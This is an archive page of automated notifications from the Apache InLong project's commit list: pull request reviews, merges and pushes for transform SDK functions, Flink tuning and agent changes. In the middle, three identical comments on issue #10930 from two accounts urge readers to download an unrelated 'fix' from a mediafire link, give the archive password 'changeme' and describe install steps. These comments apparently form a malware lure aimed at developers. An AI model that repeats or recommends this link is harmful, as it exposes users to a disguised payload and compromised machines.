aloyszhang commented on code in PR #10916:
URL: https://github.com/apache/inlong/pull/10916#discussion_r1734072686
##
inlong-manager/manager-plugins/base/src/main/java/org/apache/inlong/manager/plugin/flink/enums/Constants.java:
##
@@ -43,6 +43,10 @@ public class Constants {
aloyszhang merged PR #10865:
URL: https://github.com/apache/inlong/pull/10865
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: commits-unsubscr...@inlong
This is an automated email from the ASF dual-hosted git repository.
aloyszhang pushed a commit to branch master
in repository https://gitbox.apache.org/repos/asf/inlong.git
The following commit(s) were added to refs/heads/master by this push:
new 1394dcdbea [INLONG-10864][SDK] Transform SQL
Zkplo commented on code in PR #10928:
URL: https://github.com/apache/inlong/pull/10928#discussion_r1734117732
##
inlong-sdk/transform-sdk/src/main/java/org/apache/inlong/sdk/transform/process/function/LpadFunction.java:
##
@@ -0,0 +1,74 @@
+/*
+ * Licensed to the Apache Software
yfsn666 commented on code in PR #10928:
URL: https://github.com/apache/inlong/pull/10928#discussion_r1734153110
##
inlong-sdk/transform-sdk/src/main/java/org/apache/inlong/sdk/transform/process/function/LpadFunction.java:
##
@@ -0,0 +1,78 @@
+/*
+ * Licensed to the Apache Softwa
qiliq commented on issue #10930:
URL: https://github.com/apache/inlong/issues/10930#issuecomment-2314576627
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in inst
NEKO-JOJUK commented on issue #10930:
URL: https://github.com/apache/inlong/issues/10930#issuecomment-2314577694
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in
qiliq commented on issue #10930:
URL: https://github.com/apache/inlong/issues/10930#issuecomment-2314577090
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in inst
This is an automated email from the ASF dual-hosted git repository.
aloyszhang pushed a commit to branch master
in repository https://gitbox.apache.org/repos/asf/inlong.git
The following commit(s) were added to refs/heads/master by this push:
new 04971c37e9 [INLONG-10832][SDK] Transform SQL
aloyszhang merged PR #10863:
URL: https://github.com/apache/inlong/pull/10863
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: commits-unsubscr...@inlong
fuweng11 opened a new pull request, #10932:
URL: https://github.com/apache/inlong/pull/10932
Fixes #10931
### Motivation
Data preview supports data containing escape characters.
### Modifications
Using the transform SDK to parse data.
--
ying-hua opened a new pull request, #10933:
URL: https://github.com/apache/inlong/pull/10933
Fixes #10930
### Motivation
Add a type DAY_OF_WEEK in class DateExtractFunction, implement DAYOFWEEK
function and its unit test.
- DAYOFWEEK(date)
Returns the
justinwwhuang merged PR #10891:
URL: https://github.com/apache/inlong/pull/10891
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: commits-unsubscr...@inl
This is an automated email from the ASF dual-hosted git repository.
wenweihuang pushed a commit to branch master
in repository https://gitbox.apache.org/repos/asf/inlong.git
The following commit(s) were added to refs/heads/master by this push:
new eca3e64e04 [INLONG-10889][Agent] When the o
yfsn666 commented on code in PR #10904:
URL: https://github.com/apache/inlong/pull/10904#discussion_r1734230380
##
inlong-sdk/transform-sdk/src/test/java/org/apache/inlong/sdk/transform/process/TestTransformArithmeticFunctionsProcessor.java:
##
@@ -619,4 +619,33 @@ public void t
vernedeng commented on code in PR #10904:
URL: https://github.com/apache/inlong/pull/10904#discussion_r1734237089
##
inlong-sdk/transform-sdk/src/main/java/org/apache/inlong/sdk/transform/process/function/HexFunction.java:
##
@@ -0,0 +1,93 @@
+/*
+ * Licensed to the Apache Softw
fuweng11 commented on PR #10926:
URL: https://github.com/apache/inlong/pull/10926#issuecomment-2314697459
Reinstall and other operations require obtaining the latest data.
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and us
This is an automated email from the ASF dual-hosted git repository.
aloyszhang pushed a commit to branch master
in repository https://gitbox.apache.org/repos/asf/inlong.git
The following commit(s) were added to refs/heads/master by this push:
new 2409da5c66 [INLONG-10930][SDK] Transform sup
aloyszhang merged PR #10933:
URL: https://github.com/apache/inlong/pull/10933
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: commits-unsubscr...@inlong
Zkplo commented on code in PR #10928:
URL: https://github.com/apache/inlong/pull/10928#discussion_r1734324789
##
inlong-sdk/transform-sdk/src/main/java/org/apache/inlong/sdk/transform/process/function/LpadFunction.java:
##
@@ -0,0 +1,78 @@
+/*
+ * Licensed to the Apache Software
emptyOVO commented on code in PR #10904:
URL: https://github.com/apache/inlong/pull/10904#discussion_r1734342521
##
inlong-sdk/transform-sdk/src/main/java/org/apache/inlong/sdk/transform/process/function/HexFunction.java:
##
@@ -0,0 +1,93 @@
+/*
+ * Licensed to the Apache Softwa
emptyOVO commented on code in PR #10904:
URL: https://github.com/apache/inlong/pull/10904#discussion_r1734342521
##
inlong-sdk/transform-sdk/src/main/java/org/apache/inlong/sdk/transform/process/function/HexFunction.java:
##
@@ -0,0 +1,93 @@
+/*
+ * Licensed to the Apache Softwa
emptyOVO commented on code in PR #10904:
URL: https://github.com/apache/inlong/pull/10904#discussion_r1734342521
##
inlong-sdk/transform-sdk/src/main/java/org/apache/inlong/sdk/transform/process/function/HexFunction.java:
##
@@ -0,0 +1,93 @@
+/*
+ * Licensed to the Apache Softwa
vernedeng opened a new pull request, #10936:
URL: https://github.com/apache/inlong/pull/10936
Fixes #10929
### Motivation
### Modifications
### Verifying this change
*(Please pick either of the following options)*
- [ ] This c
emptyOVO commented on code in PR #10904:
URL: https://github.com/apache/inlong/pull/10904#discussion_r1734354903
##
inlong-sdk/transform-sdk/src/test/java/org/apache/inlong/sdk/transform/process/TestTransformArithmeticFunctionsProcessor.java:
##
@@ -619,4 +619,33 @@ public void
emptyOVO commented on code in PR #10904:
URL: https://github.com/apache/inlong/pull/10904#discussion_r1734358519
##
inlong-sdk/transform-sdk/src/test/java/org/apache/inlong/sdk/transform/process/TestTransformArithmeticFunctionsProcessor.java:
##
@@ -619,4 +619,33 @@ public void
ying-hua opened a new pull request, #10937:
URL: https://github.com/apache/inlong/pull/10937
Fixes #10935
### Motivation
- Add a type DAY_NAME in class DateExtractFunction, implement DAYNAME
function and its unit test.
- DAYNAME(date)
Returns the name
luchunliang merged PR #10936:
URL: https://github.com/apache/inlong/pull/10936
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: commits-unsubscr...@inlon
This is an automated email from the ASF dual-hosted git repository.
luchunliang pushed a commit to branch master
in repository https://gitbox.apache.org/repos/asf/inlong.git
The following commit(s) were added to refs/heads/master by this push:
new 02a3815b43 [INLONG-10929][SDK] Support Inlo
PeterZh6 commented on code in PR #10916:
URL: https://github.com/apache/inlong/pull/10916#discussion_r1734688395
##
inlong-manager/manager-plugins/base/src/main/java/org/apache/inlong/manager/plugin/flink/FlinkParallelismOptimizer.java:
##
@@ -0,0 +1,220 @@
+/*
+ * Licensed to t
PeterZh6 commented on code in PR #10916:
URL: https://github.com/apache/inlong/pull/10916#discussion_r1734771225
##
inlong-audit/audit-common/src/main/java/org/apache/inlong/audit/consts/OpenApiConstants.java:
##
@@ -15,7 +15,7 @@
* limitations under the License.
*/
-packa
Zkplo opened a new pull request, #10941:
URL: https://github.com/apache/inlong/pull/10941
Fixes #10939
### Motivation
Add one function classe: STRCMP . Also, add the corresponding unit test
codes.
### Verifying this change
*(Please pick either of
Zkplo opened a new pull request, #10943:
URL: https://github.com/apache/inlong/pull/10943
Fixes #10942
### Motivation
Added official SQL functions for DateExtractFunction, FromUnixTimeFunction,
and TimestampAdFunction classes
### Verifying this change
justinwwhuang commented on code in PR #10801:
URL: https://github.com/apache/inlong/pull/10801#discussion_r1735556446
##
inlong-agent/agent-plugins/src/main/java/org/apache/inlong/agent/plugin/sources/RedisSource.java:
##
@@ -17,54 +17,169 @@
package org.apache.inlong.agent.p
aloyszhang merged PR #10926:
URL: https://github.com/apache/inlong/pull/10926
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: commits-unsubscr...@inlong
This is an automated email from the ASF dual-hosted git repository.
aloyszhang pushed a commit to branch master
in repository https://gitbox.apache.org/repos/asf/inlong.git
The following commit(s) were added to refs/heads/master by this push:
new 4cf7ccba60 [INLONG-10847][Dashboard] Agent t
emptyOVO opened a new pull request, #10945:
URL: https://github.com/apache/inlong/pull/10945
Fixes #10944
### Motivation
Implement annotation support for parser,Reference was made to the
implementation of #10929
### Modifications
###
vernedeng commented on code in PR #10945:
URL: https://github.com/apache/inlong/pull/10945#discussion_r1735662565
##
inlong-sdk/transform-sdk/src/main/java/org/apache/inlong/sdk/transform/process/parser/ParserTools.java:
##
@@ -0,0 +1,64 @@
+package org.apache.inlong.sdk.transfo
38 matches
Mail list logo